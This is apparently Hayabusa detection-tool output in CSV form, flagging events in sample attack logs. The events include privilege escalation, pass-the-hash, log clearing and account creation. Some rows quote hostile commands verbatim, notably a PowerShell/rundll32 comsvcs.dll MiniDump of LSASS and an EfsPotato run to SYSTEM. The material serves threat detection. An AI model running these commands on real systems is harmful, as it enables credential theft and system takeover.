2021-06-11 06:21:29.441 +09:00,fs01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\bouWFQYO.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID5145-Remote schedule task creation (ATexec).evtx
2021-06-11 06:21:29.441 +09:00,fs01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\bouWFQYO.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx"
2021-06-13 15:17:18.087 +09:00,sv-dc.hinokabegakure-no-sato.local,59,informational,Bits Job Creation,Job Title: test : URL: http://192.168.10.254:80/calc.exe,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/YamatoSecurity/T1197_BITS Jobs/Windows-BitsClient.evtx
2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx
2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx
2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx
2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx
2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx
2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx
2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx
2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx
2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx
2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx
2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx
2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx
2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx
2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx
2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx
2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx
2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx
2021-08-23 04:33:38.725 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: c:\temp\EfsPotato.exe whoami : Path: C:\temp\EfsPotato.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: ""cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
2021-08-23 04:33:38.844 +09:00,LAPTOP-JU4M3I0E,17,critical,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
2021-08-23 04:33:38.884 +09:00,LAPTOP-JU4M3I0E,18,critical,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: whoami : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: c:\temp\EfsPotato.exe whoami,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,high,Whoami Execution Anomaly,,rules/sigma/process_creation/win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
2021-08-23 04:33:52.250 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe"" -Embedding : Path: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: C:\WINDOWS\system32\svchost.exe -k DcomLaunch -p",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
2021-10-19 23:33:13.262 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1201-Password Policy Discovery/ID4688-Password policy discovery via commandline.evtx
2021-10-19 23:40:28.001 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4688-Group discovery via commandline.evtx
2021-10-19 23:42:41.218 +09:00,FS03.offsec.lan,4728,medium,User added to global security group,Member added: - : SID: S-1-5-21-3410678313-1251427014-1131291384-1004 : Group: None : Subject user: admmig : Subject domain: OFFSEC,rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4688-User creation via commandline.evtx
2021-10-19 23:42:41.234 +09:00,FS03.offsec.lan,4720,medium,Local user account created,User: toto3 : SID:S-1-5-21-3410678313-1251427014-1131291384-1004,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4688-User creation via commandline.evtx
2021-10-19 23:44:30.780 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID4688-Network share discovery or connection via commandline.evtx
2021-10-19 23:45:16.394 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688-Network share manipulation via commandline.evtx
2021-10-20 22:39:12.731 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx
2021-10-20 22:39:17.315 +09:00,FS03.offsec.lan,4624,informational,Logon Type 9 - NewCredentials,User: admmig : Workstation: - : IP Address: ::1 : Port: 0 : LogonID: 0x266e045 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx
2021-10-20 22:39:17.315 +09:00,FS03.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x266e045,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx
2021-10-20 22:39:17.315 +09:00,FS03.offsec.lan,4624,medium,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx
2021-10-20 22:39:17.315 +09:00,FS03.offsec.lan,4624,high,Successful Overpass the Hash Attempt,,rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx
2021-10-20 22:39:21.730 +09:00,FS03.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Sysmon\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx
2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1086,technique_name=PowerShell : Command: powershell.exe -NoP -C ""C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id \Windows\Temp\76nivOxA.dmp full;Wait-Process -Id (Get-Process rundll32).id"" : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: OFFSEC\admmig : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,Suspicious PowerShell Parent Process,,rules/sigma/process_creation/win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,WMI Spawning Windows PowerShell,,rules/sigma/process_creation/win_wmi_spwns_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,PowerShell Get-Process LSASS,,rules/sigma/process_creation/win_susp_powershell_getprocess_lsass.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,LSASS Memory Dumping,,rules/sigma/process_creation/win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
2021-10-20 23:18:56.089 +09:00,FS03.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1086,technique_name=PowerShell : Command: ""C:\Windows\System32\rundll32.exe"" C:\Windows\System32\comsvcs.dll MiniDump 512 \Windows\Temp\76nivOxA.dmp full : Path: C:\Windows\System32\rundll32.exe : User: OFFSEC\admmig : Parent Command: powershell.exe -NoP -C ""C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id \Windows\Temp\76nivOxA.dmp full;Wait-Process -Id (Get-Process rundll32).id""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
2021-10-20 23:18:56.089 +09:00,FS03.offsec.lan,1,medium,Process Dump via Comsvcs DLL,,rules/sigma/process_creation/win_susp_comsvcs_procdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
2021-10-20 23:18:56.105 +09:00,FS03.offsec.lan,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
2021-10-20 23:18:56.105 +09:00,FS03.offsec.lan,10,critical,Lsass Memory Dump via Comsvcs DLL,,rules/sigma/process_access/sysmon_lsass_dump_comsvcs_dll.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
2021-10-20 23:29:09.758 +09:00,FS03.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x26bdfac,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
2021-10-20 23:29:09.758 +09:00,FS03.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 49192 : LogonID: 0x26bdfac,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
2021-10-20 23:29:09.773 +09:00,FS03.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x26bdfde,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
2021-10-20 23:29:09.773 +09:00,FS03.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 38940 : LogonID: 0x26bdfde,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
2021-10-20 23:29:09.836 +09:00,FS03.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x26be000,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
2021-10-20 23:29:09.836 +09:00,FS03.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 54742 : LogonID: 0x26be000,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
2021-10-20 23:29:09.898 +09:00,FS03.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x26be01f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
2021-10-20 23:29:09.898 +09:00,FS03.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 54742 : LogonID: 0x26be01f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
2021-10-20 23:29:09.961 +09:00,FS03.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x26be03c,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
2021-10-20 23:29:09.961 +09:00,FS03.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 54742 : LogonID: 0x26be03c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
2021-10-20 23:29:10.214 +09:00,FS03.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp\2V7Be7Gq.dmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
2021-10-20 23:29:10.214 +09:00,FS03.offsec.lan,5145,medium,Suspicious Access to Sensitive File Extensions,,rules/sigma/builtin/security/win_susp_raccess_sensitive_fext.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
2021-10-20 23:29:10.542 +09:00,FS03.offsec.lan,4656,critical,LSASS Access from Non System Account,,rules/sigma/builtin/security/win_lsass_access_non_system_account.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
2021-10-20 23:29:10.542 +09:00,FS03.offsec.lan,4656,high,Generic Password Dumper Activity on LSASS,,rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
2021-10-20 23:29:11.230 +09:00,FS03.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp\2V7Be7Gq.dmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
2021-10-20 23:29:11.230 +09:00,FS03.offsec.lan,5145,medium,Suspicious Access to Sensitive File Extensions,,rules/sigma/builtin/security/win_susp_raccess_sensitive_fext.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
2021-10-20 23:29:12.553 +09:00,FS03.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp\2V7Be7Gq.dmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
2021-10-20 23:29:12.553 +09:00,FS03.offsec.lan,5145,medium,Suspicious Access to Sensitive File Extensions,,rules/sigma/builtin/security/win_susp_raccess_sensitive_fext.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
2021-10-20 23:29:13.725 +09:00,FS03.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Sysmon\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
2021-10-20 23:29:22.291 +09:00,FS03.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Sysmon\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
2021-10-20 23:39:26.349 +09:00,FS03.offsec.lan,4104,high,Suspicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/powershell_suspicious_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx
2021-10-20 23:39:26.349 +09:00,FS03.offsec.lan,4104,high,PowerShell Get-Process LSASS in ScriptBlock,,rules/sigma/powershell/powershell_script/powershell_suspicious_getprocess_lsass.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx
2021-10-22 01:27:02.319 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: cscript.exe //e:jscript testme.js : Path: C:\Windows\System32\cscript.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx
2021-10-22 01:27:02.319 +09:00,LAPTOP-JU4M3I0E,1,medium,WSF/JSE/JS/VBA/VBE File Execution,,rules/sigma/process_creation/win_susp_script_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx
2021-10-22 01:27:02.999 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmdkey.exe"" /generic:Microsoft_Windows_Shell_ZipFolder:filename=C:\Users\bouss\AppData\Local\Temp\lync.zip /pass:tWIMmIF /user:"""" : Path: C:\Windows\System32\cmdkey.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: cscript.exe //e:jscript testme.js",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx
2021-10-22 01:27:02.999 +09:00,LAPTOP-JU4M3I0E,1,medium,Suspicious ZipExec Execution,,rules/sigma/process_creation/win_pc_susp_zipexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx
2021-10-22 01:27:12.858 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Users\bouss\AppData\Local\Temp\Temp3_lync.zip\i.exe"" : Path: C:\Users\bouss\AppData\Local\Temp\Temp3_lync.zip\i.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: cscript.exe //e:jscript testme.js",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx
